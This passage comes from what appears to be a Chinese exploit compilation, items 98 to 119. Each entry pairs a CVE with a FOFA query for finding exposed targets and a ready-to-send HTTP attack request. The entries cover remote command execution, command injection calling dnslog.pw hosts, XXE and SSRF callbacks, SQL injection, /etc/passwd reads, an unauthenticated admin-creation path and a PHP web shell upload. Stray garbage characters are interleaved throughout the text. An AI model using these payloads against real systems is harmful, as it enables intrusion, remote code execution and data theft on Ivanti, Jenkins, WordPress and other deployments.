User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 S& [* k/ Z- S. `3 O
Accept-Encoding: gzip) j- N" O/ U- [( q# q; l
Connection: close
% S( M4 a# n5 \# }- GCookie: rememberMe=PAYLOAD
3 j3 \4 q; k% O, i, N6 RX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"7 ~9 w" X, f# `* z/ A( g1 ~3 E
2 P- Y$ N& F6 r& Y' u6 G& ^

1 E$ S9 d% H$ u7 ?2 }9 g+ m98. SpiderFlow爬虫平台远程命令执行
! q9 W3 w: q' h. ^CVE-2024-0195
3 \5 w  O  `$ @: wFOFA:app="SpiderFlow"6 E" t% X- ^4 _+ x
POST /function/save HTTP/1.1/ c8 w% g' \3 y% x. @5 [2 A2 _
Host: 192.168.40.130:8088: L$ F1 g3 x4 m" D6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 }, f6 ~+ A% {/ f
Connection: close3 z+ D& i/ `: r, |5 Y& {2 ]; Z/ j
Content-Length: 1210 V2 X8 w4 c1 q' p
Accept: */*
8 f# ]$ |: d9 N- l- w" O7 U: r: ~Accept-Encoding: gzip, deflate
1 \( J) O0 l3 E* o( |, D8 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 p" f: w/ v/ J3 ]  W$ L/ iContent-Type: application/x-www-form-urlencoded; charset=UTF-8
- o$ V7 m7 s" v9 ^& \X-Requested-With: XMLHttpRequest
* x5 a" o0 X: r7 D- [5 C( a1 B5 k
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B4 \: p, K- {, s, L8 l" L( N( L
5 P+ A5 P' p: G2 W

) V* v+ ~( e8 n99. Ncast盈可视高清智能录播系统busiFacade RCE
0 b6 }' k' s5 mCVE-2024-0305
0 i' c2 O3 T# q: T+ F" D. y' {3 n: MFOFA:app="Ncast-产品" && title=="高清智能录播系统"
) _2 X& q+ A: }POST /classes/common/busiFacade.php HTTP/1.1" i# p5 H; L3 k) W
Host: 192.168.40.130:8080
& Y! R- Q4 X$ O! ?9 A" X, WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% E% f5 _: ?  yConnection: close
% @* w2 i, e6 {7 Q! sContent-Length: 154
. C; s# z/ U% K+ G" M. jAccept: */*& B" m6 |" S4 |# g5 |& a
Accept-Encoding: gzip, deflate
+ Y. D! R7 ^, H8 _9 }) SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  N8 l! r6 M3 d- `Content-Type: application/x-www-form-urlencoded; charset=UTF-85 q* j* e8 F9 \
X-Requested-With: XMLHttpRequest
7 y% H/ A+ P2 S% H' J* Q" R+ T& e  p1 H' @
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
" E$ x* c. l0 n1 V( A" X; X4 Y. g/ V' Y

( k* |& U! e) u2 c100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 n1 B1 L- ~& y$ G
CVE-2024-0352
5 h$ O. V; K5 J* q, }FOFA:icon_hash="874152924"6 v4 [/ d# j' d. ~
POST /api/file/formimage HTTP/1.1# k; |& S/ |( q4 W4 o3 F5 |
Host: 192.168.40.1308 ~( a! a# p' w, j
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ p0 J2 C4 N" i& @- _& z% L, k- ]
Connection: close
. W  ^2 `- t: wContent-Length: 201
9 S% @# o. \  ?6 n0 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
( t  d# o: @; b" V8 B' _8 r& v4 lAccept-Encoding: gzip- b+ }! n" z, z4 L

# O; I, R3 e* {6 q- z4 ^- @# n; Q------WebKitFormBoundarygcflwtei
7 I! h5 T+ S0 M( O' `Content-Disposition: form-data; name="file";filename="IE4MGP.php"# Y5 I, }  b* y6 b1 |# K: ~8 Z
Content-Type: application/x-php
( l8 N, ?# E/ C1 ?4 o- ^
( e+ d5 @2 ~" s) t2ayyhRXiAsKXL8olvF5s4qqyI2O
' H  S& `* I6 D. R4 u------WebKitFormBoundarygcflwtei--6 c) e$ G$ K+ S/ j8 C' F8 ~

$ Q- w/ g: }3 K1 ?: h9 y
3 u+ C9 z3 |) U& X; a/ z7 h! v101. ivanti policy secure-22.6命令注入. m4 n5 T! r' k) h: f( h  D- S
CVE-2024-218871 c( a) J( t$ d- F
FOFA:body="welcome.cgi?p=logo". H8 Y' u' y. ]
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
+ _8 O" J  @+ ^$ u7 r1 W+ g; oHost: x.x.x.xx.x.x.x  f5 ^8 o/ ~4 i) N) Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, x: G# Y2 F6 tConnection: close
- P, {/ v& e' F2 AAccept-Encoding: gzip+ e  ]4 _# [; V' B) r
" r2 c5 K* Z$ n3 \* U$ y0 g; O

! W, ?' N8 d$ k9 H8 c/ X0 J: o( v102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行' \5 f: ]/ S1 R
CVE-2024-21893
9 L. l2 R9 U4 k# C9 B- e! z7 X! H  ~FOFA:body="welcome.cgi?p=logo"
* w; C2 K8 f/ O7 M  b& h! x2 {9 FPOST /dana-ws/saml20.ws HTTP/1.1
4 g: Z4 l1 z) V! S. }( BHost: x.x.x.x( x* o2 Z' z  l: b6 F+ J( ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
  n& M# _  F2 u, |Connection: close
: n1 b( x# Y+ JContent-Length: 792' [8 R$ X) J9 X& @: g# ^+ b
Accept-Encoding: gzip" y% u) p( N! u2 A
9 z( _! h7 Z5 s4 b) s; E* S
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>+ k# x1 V4 _$ Q* u

9 N4 r2 w+ Q# h% G! k103. Ivanti Pulse Connect Secure VPN XXE
3 n9 N) q( N! |: |; uCVE-2024-22024. _, V. Z% Z9 B3 Q- N  o
FOFA:body="welcome.cgi?p=logo"4 W0 L5 X; F( t! |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
) u) q! ~- F+ S4 ^6 m+ @1 Y: mHost: 192.168.40.130:111
( y9 j& V! B8 s( l( a7 [- bUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
) f; H: G. j- A7 FConnection: close
9 s1 _! Z% J# K2 I* R1 QContent-Length: 204
# P- f* o( i, b) T! p1 ZContent-Type: application/x-www-form-urlencoded1 g& ]! @5 \2 Q9 z* B; ?) F
Accept-Encoding: gzip
! @0 L4 V- k3 o" f4 ?# E/ M% R& L
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==3 I5 \( z2 u; Q% g+ i- j# `  T8 T

# c! s5 N# D) G. A3 v
7 w, @( n9 Q  h- n其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
, X1 m4 w9 P7 t( ]6 R$ O<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>" S' }3 C2 V" W$ x

4 k5 r8 F5 r1 r. @0 `' ]" p4 Y  U! d$ b  j* e. m5 X6 U% O% W9 z" J
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露& m! z" z* c; F: \1 o
CVE-2024-0569
1 I( G% E" g4 `4 ~FOFA:title="TOTOLINK"
/ D4 ^( R) E, O' f% tPOST /cgi-bin/cstecgi.cgi HTTP/1.1; r3 b8 {/ Q0 D5 P3 b
Host:192.168.0.1) R0 `7 I6 W6 z8 o
Content-Length:412 F9 t8 M, h2 l3 E/ t6 ^5 O
Accept:application/json,text/javascript,*/*;q=0.01
% b) _( X2 ]( N0 ?! nX-Requested-with: XMLHttpRequest
# E0 @2 S2 _4 z% vUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
5 R* P% v. u; G5 E. w1 EContent-Type: application/x-www-form-urlencoded:charset=UTF-82 ?" O* c* ~+ g) t+ S/ j
Origin: http://192.168.0.10 e; @$ K4 `! p2 Q) @2 S- h+ ]
Referer: http://192.168.0.1/advance/index.html?time=16711523805644 p. |- t9 T2 V- F( |
Accept-Encoding:gzip,deflate" ]4 u7 j  \3 ]* n) H$ {
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7% M/ ]( r! D7 {) t* B
Connection:close. y$ H  y) H% [9 ~! C

+ A% d+ [9 b' b6 |{
: L* t9 R2 r# P6 k: U1 C. v"topicurl":"getSysStatusCfg",7 b( X# f& z6 j" r4 q* D5 Y
"token":""
/ @' W5 H  i. k& r: P}2 r% P# s. l* u# L
7 w7 K; d/ W7 [& X; l
105. SpringBlade v3.2.0 export-user SQL 注入" [" g9 w* _+ d( a' a& c$ P1 r
FOFA:body="https://bladex.vip"# }& X, I& U  A' O, C0 D
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1" c( p, i+ S2 v$ i1 G9 K  s
+ C/ s1 V2 L4 f, ]2 m. V4 t( \1 _
106. SpringBlade dict-biz/list SQL 注入
0 Y7 {+ f. @. Z( n2 j# BFOFA:body="Saber 将不能正常工作"! ~* z, [1 @  \4 U1 L( a
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
* N7 ~# P8 H( a+ f8 F9 VHost: your-ip, C3 m' b9 N9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 a+ p+ o% p8 d7 a% i1 E% xBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A8 a' H, C; I4 N$ r" [$ s! s
Accept-Encoding: gzip, deflate
5 u8 N/ P& N1 e7 i% KAccept-Language: zh-CN,zh;q=0.9
' a, |( r& N3 W8 o+ q2 P7 OConnection: close
$ T: J- j& W! ^" a7 Q; k
* x* v7 w& @# W7 Z7 D5 S  T$ P, ?0 F" r6 x: r% \" z5 K
107. SpringBlade tenant/list SQL 注入
/ k2 [  r7 X7 d* [* }FOFA:body="https://bladex.vip"0 H& t8 i" e5 Q/ ~% y
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
+ {2 i: L0 Y' L9 h6 RHost: your-ip$ `4 F/ ?0 r1 `  m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ L9 `1 Z$ G% mBlade-Auth:替换为自己的% U7 e$ o) d+ s4 s2 U# O
Connection: close' {8 \4 z6 J0 t: t. M
, s0 S4 \9 }1 V- z' p; e
8 s9 f( c: C- l& s  u9 W
108. D-Tale 3.9.0 SSRF
$ y* J5 V- ^% E# L2 \8 r( I3 ]CVE-2024-21642
* m/ ^4 A6 ?, H6 U/ _# |# d" PFOFA:"dtale/static/images/favicon.png": S0 W, N, g; i- H7 c; I! a
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.18 I& ]/ ~; t$ f4 q
Host: your-ip
9 h+ X, j* H* q  ^) O9 cAccept: application/json, text/plain, */*
' q9 ^$ ^* X* P( p# Q5 c5 \0 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ _: ^- T; ^4 h* q6 a2 UAccept-Encoding: gzip, deflate4 m) Q4 K, i8 e" ~2 g; K4 {0 Y9 ~. w
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8( g* J6 v/ `3 y. ?+ T7 u8 Q9 U$ \# T9 _
Connection: close4 q- L/ k9 a5 M4 N" Q: s0 ?/ T
9 h; e/ F# w% {7 d, z  b
# u* j9 S4 m: @( I1 e* }7 v
109. Jenkins CLI 任意文件读取
: u9 p# u9 t1 |" w$ [CVE-2024-23897
- w" F! F8 h6 ?6 Z/ cFOFA:header="X-Jenkins"8 ^0 X- k$ |! ?$ g& W
POST /cli?remoting=false HTTP/1.1! S5 [& l, v* `! G. b6 x& i
Host:
9 d3 A& n4 V( U' `Content-type: application/octet-stream
) D2 [9 ~& e  T/ ~- ^3 @  f5 x# fSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
: t' s) |! I' Y( f- y# ~Side: upload5 s3 y* r# R* ?
Connection: keep-alive
9 E0 [% x9 |: b* n  UContent-Length: 163
& I5 u$ i/ G: p" E6 V# S7 E, D
( {5 }5 E3 i# e! S1 fb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'' Y- \" u; m- ^# E* Q' g0 w% t

4 h& r: U4 T, Z2 k* G  j$ n. i4 A. s  S5 u- N
POST /cli?remoting=false HTTP/1.1
8 @" y$ J9 M0 q5 F' S0 MHost:
' r% h# U- Z: @7 X+ Z& u% |Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e923 H; J6 m" o+ C# _9 Q4 z! s
download
7 \( k) r" l1 l# [5 K' q/ ~: O! DContent-Type: application/x-www-form-urlencoded3 n: b( i* Q" ?0 f+ S4 @
Content-Length: 04 Q- N. y2 U! y* W. e8 r$ l" g

+ z) P% z* z+ ~
2 O- {2 H2 B; V$ |2 \- ~2 `* nERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
: R3 [9 d" o7 }, G4 |- Ljava -jar jenkins-cli.jar help8 V1 h% \" m0 ~
[COMMAND]* w8 K" q2 T3 G# k; m0 Z3 W
Lists all the available commands or a detailed description of single command.& j0 ^+ y- ?$ R4 r
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)+ v7 l" ]# v. n5 _

3 K" ]0 A/ O7 D6 L1 o% b7 a
8 M0 F! |: Q. x# A; x6 Q/ V110. Goanywhere MFT 未授权创建管理员; d* K( X! k3 a. g4 `3 S, H7 I. y' x
CVE-2024-0204
2 b9 b+ ^; ~& r, pFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"$ i9 Y" {) l) G/ [( K, Y
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1, y8 }0 t. T" _0 O" |+ A3 N
Host: 192.168.40.130:80000 Q+ D. J  t( {$ R  _6 T
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.366 \' t. n& {# ]+ i
Connection: close3 `! x. Y* Z8 m$ U' Q
Accept: */*3 H3 v7 u5 U+ Y. n1 \. R- f/ v
Accept-Language: en% S% p$ c2 p& Q7 R/ u# y" K
Accept-Encoding: gzip# E; f1 L& K/ L. U. Q
6 [# }. m# i' M
. a, g' B4 f3 Z& R  `9 d$ G3 ^# Z5 c
111. WordPress Plugin HTML5 Video Player SQL注入1 N* H" i/ P( y$ M3 }* T% |
CVE-2024-1061
  C( u2 S0 V& J' v" J0 y3 qFOFA:"wordpress" && body="html5-video-player"! ]+ _9 H: z$ G" ^. N6 y
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1: w3 V6 {% b( Y( E: r
Host: 192.168.40.130:112: F! `/ A9 {. `. C/ k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( o1 h, J1 D5 M- b, C6 dConnection: close2 [; A3 n1 L3 B4 _0 J  \
Accept: */*
/ u8 o9 e/ |; w5 G# n) ~6 Q4 uAccept-Language: en
: Z( |2 y  r1 ~1 n& X, O; l0 C7 [Accept-Encoding: gzip
+ Z* |! K9 Y: Q& i" U$ k6 F) i0 g% P0 m8 T/ ~4 z# y/ _' n5 y
  V9 n; _2 f7 d& x
112. WordPress Plugin NotificationX SQL 注入- f/ N2 A7 ]2 d% y; N9 {
CVE-2024-1698
7 \% y! j- u2 ZFOFA:body="/wp-content/plugins/notificationx") ?, |: d4 G& M8 x0 Y
POST /wp-json/notificationx/v1/analytics HTTP/1.10 o9 f" \: w& Y7 ^
Host: {{Hostname}}
2 W6 W+ l2 Y4 n' \8 ~Content-Type: application/json
! e4 L3 X6 e* M( E# g) O8 E& ?; b9 l6 f4 ]1 v2 z
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
( X5 h1 b3 j8 X1 @9 U$ R. Q$ t, v$ }1 _9 C

3 {+ W2 ~. L: H113. WordPress Automatic 插件任意文件下载和SSRF/ s5 n! J- Z2 }- N
CVE-2024-27954
; y* G9 ^$ |2 ~3 p/ iFOFA:"/wp-content/plugins/wp-automatic"
  m1 j" H& ~- k# D6 GGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.10 W; p9 R0 o. D7 O; E: o, K
Host: x.x.x.x
: }! r) o; R; K+ ZUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; v9 G0 \, F0 o/ }2 ?9 n+ F* r9 f
Connection: close
9 @" \& k  q% I8 aAccept: */*
. x# Y% p' A' j' o, l  pAccept-Language: en
) y. E4 u5 E2 x- C/ t$ w" SAccept-Encoding: gzip( q& X/ K/ Y/ Y5 B2 g

9 _4 E. F8 `' i3 _' U. q$ j
, f. H: T6 K2 C- G( O: L114. WordPress MasterStudy LMS插件 SQL注入
' g, G' u6 p0 v, B  V+ K" YFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
* h# Z8 Q. \: u( [0 t4 jGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1$ {( v( u& A+ H, W9 O
Host: your-ip' x, j' \2 p: E5 Q9 ^
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 u, n" Q* M! fAccept-Charset: utf-8
+ T) A: d6 `+ n; \  k: O+ K/ _Accept-Encoding: gzip, deflate- I' M' l% C& i' g2 v; F
Connection: close" P8 j" ?5 f( m5 o$ B+ p6 g
5 P: C* d2 x* q/ x* `8 }, |8 r

+ J4 O# l5 V; `7 C5 R8 o% b; `9 Z115. WordPress Bricks Builder <= 1.9.6 RCE5 M8 g0 ]$ L& u4 v
CVE-2024-25600
, d" q2 x3 Y. X% d6 G5 x: n3 JFOFA: body="/wp-content/themes/bricks/"
: o3 t" h3 W4 P+ g第一步,获取网站的nonce值
7 n- N1 C6 p" [7 c0 [GET / HTTP/1.14 I0 _& {6 X2 E. Q+ c+ U8 u4 Y
Host: x.x.x.x! h4 u1 E" z- I) x" e2 }
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
5 G5 q- ~! W7 [( y5 ~7 ^( CConnection: close
# T* N. q8 f: D* B5 k3 P" s9 ^! WAccept-Encoding: gzip
& t5 t/ S/ C$ h: U% h) C
; G. B# W: z0 R; R/ r" G3 T0 V3 ~# h& ~3 ~2 s
第二步替换nonce值,执行命令1 ^# g0 z7 H8 c( o9 D5 P
POST /wp-json/bricks/v1/render_element HTTP/1.1+ ]5 |4 R, U8 N3 p  }3 |
Host: x.x.x.x
6 |; o: b( A  U2 V2 [! v3 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% s9 l8 i4 R  c$ q+ b( m! |Connection: close# U+ i5 C' z! u+ R$ s
Content-Length: 356. g, i( x( g2 j: T
Content-Type: application/json4 ]8 L1 P# O: u& G9 B) [
Accept-Encoding: gzip5 }6 f& G# A, P

' I6 C5 o# j( X6 z* Z, N9 \& c$ N{# N# ~& S. C/ O# R$ [1 f+ ~) R# w# V
"postId": "1",( S  G0 \, [% T; M& K, T/ U7 {6 F
  "nonce": "第一步获得的值",
$ z( g+ V" X% }" p# M6 ~( [  "element": {
5 }( M( u. {) D5 v& \4 O    "name": "container"," X# [7 d6 I  [, H# m$ w
    "settings": {
) m; `6 F# w* V- C      "hasLoop": "true",
; N/ O% F( _. L) D# B8 f      "query": {. @% w. D# P- E" ?
        "useQueryEditor": true,
, ^4 m$ T# g0 C        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);"," k$ t/ [- X4 _+ S. v1 Q& x
        "objectType": "post"
( |5 s) O$ o7 o' `0 b      }
3 W" C, R6 d: @" f, m+ T    }* k- u% t# p- r  m' B6 D0 `
  }
  A0 p, v7 I+ O( M+ N! h3 h5 A  h}( ~# y! V/ }2 E& ], k# N
* q! V8 t( }  t% A/ U7 y$ \
$ e: S6 o% _, K( c- D+ j
116. wordpress js-support-ticket文件上传
2 Y! p2 ^" e, {. @5 ^FOFA:body="wp-content/plugins/js-support-ticket"3 z# _7 V- Z% c& T/ g
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
0 U+ e$ `% i8 |6 C9 {- _; ^Host:
* \! L+ r+ X; RContent-Type: multipart/form-data; boundary=--------767099171& S3 [0 l" p# U
User-Agent: Mozilla/5.0
5 t) ^: h3 R& p7 l% A
% I3 x; e: G! R----------7670991718 S/ B. e: n, K+ O* B
Content-Disposition: form-data; name="action"0 m5 ^- Q) R, `9 M
configuration_saveconfiguration
9 t5 G/ ?% a4 |1 g9 P( |----------767099171
: M- Q# @3 t8 t8 NContent-Disposition: form-data; name="form_request"# v. z8 ^$ ]( [3 f% `0 P2 {
jssupportticket
0 Y" B8 n  \- e2 i----------767099171$ u- U2 d/ A& U/ c6 }7 b
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"" m  s4 ~  E- O9 L9 a
Content-Type: image/png- N; J5 M7 v7 F, b, V2 `5 }
----------767099171--' y/ B5 y3 u, g5 w$ H

# Y/ w' n7 Z2 ]1 R7 e
' V* {, y, B# ^" b117. WordPress LayerSlider插件SQL注入
8 ^0 [' B9 ?' Z+ k) y4 Hversion:7.9.11 – 7.10.03 t  n4 S& v* D/ B7 K  j
FOFA:body="/wp-content/plugins/LayerSlider/"
6 V* G- I: @6 y  \9 [; lGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
5 a/ P* n) `: G' _# ?" K6 DHost: your-ip
9 {5 t& }( s! o  C8 r! D7 F" XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: t0 [9 ^' s' D+ Q; b# WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* R9 }" q4 B( q4 ^6 ?8 M- B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) c' A( \4 k& p
Accept-Encoding: gzip, deflate, br1 Q8 J( |& b4 U4 R" }, H5 i$ h" V
Connection: close1 s3 V. V7 s9 o! W/ q) c& \
Upgrade-Insecure-Requests: 1% l9 U/ r+ E2 t6 I8 s
! W3 Z9 m5 ^. v4 ~+ C4 _: a" N
/ X) y1 I2 g' N3 c
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传' a/ ^* @, x$ J! W; W8 j. F
CVE-2024-0939- z& A0 [/ w2 ~) B9 a
FOFA:title="Smart管理平台"
6 Z7 n! B, V/ ZPOST /Tool/uploadfile.php? HTTP/1.1
4 k- M! _8 W  A* d# P/ |Host: 192.168.40.130:8443
/ I6 e) G' w" x! j+ X3 z6 q# yCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8; C2 j, @/ x2 a, m- v9 T, J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0/ [* o, U8 G4 u# v" T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ M. J4 C" g/ s' xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' V6 @- @& s+ k9 U. p4 WAccept-Encoding: gzip, deflate) x, _! f# n; Z! K6 ^5 F6 H) p
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
( }7 g7 ?; i3 u% l9 MContent-Length: 405
, n) ], I. O' |& @# y: hOrigin: https://192.168.40.130:84433 m+ U% L8 B4 i; o& R8 ~  A2 T
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
: G$ ]- N2 n  }  @Upgrade-Insecure-Requests: 1
" }0 M5 R) U: e5 ySec-Fetch-Dest: document
4 P: G5 X" E" I  I" Z7 X7 @Sec-Fetch-Mode: navigate
. f" s1 f/ B, ]8 _5 G7 z1 g# qSec-Fetch-Site: same-origin5 L4 X% b8 Y/ e
Sec-Fetch-User: ?12 M9 I5 f5 Z2 s: X: p! l' g
Te: trailers
4 n. [6 k* ]- h- r+ ]Connection: close# R) G5 o; W0 @

: `0 q. w8 R% H" c-----------------------------13979701222747646634037182887( [- }- O) {# g% T0 A
Content-Disposition: form-data; name="file_upload"; filename="contents.php"1 G7 D4 Q4 B1 y( |  z# H
Content-Type: application/octet-stream
; @. z  l) v9 W1 A* A( i, t/ s/ y( z* C2 B  ^; }
<?php0 V/ @1 p' r9 e# d6 i3 l7 N; j
system($_POST["passwd"]);2 J& u0 r! V! [' l) {9 ?6 y" J
?>
. M" N. J. m( A/ K2 X9 N6 E-----------------------------139797012227476466340371828879 O: a4 t, X; N8 t
Content-Disposition: form-data; name="txt_path"5 p3 a1 ^3 f0 ?' [

" f+ {; B5 e% O0 B/ t/home/src.php
- s( G$ k* |1 u" e5 ~$ }-----------------------------13979701222747646634037182887--
3 y% Z' x- I* t% Y3 @, W8 b3 q/ T( k$ ]0 {4 n; ^) J& W7 K

$ ^  u( `* p- P* p) i8 ?访问/home/src.php3 S* F" f. ?8 q1 J

# F( a% l1 p& _0 N119. 北京百绰智能S20后台sysmanageajax.php sql注入
2 z8 {% \; p: Y) O; Q% `8 ]% c9 c' yCVE-2024-1254
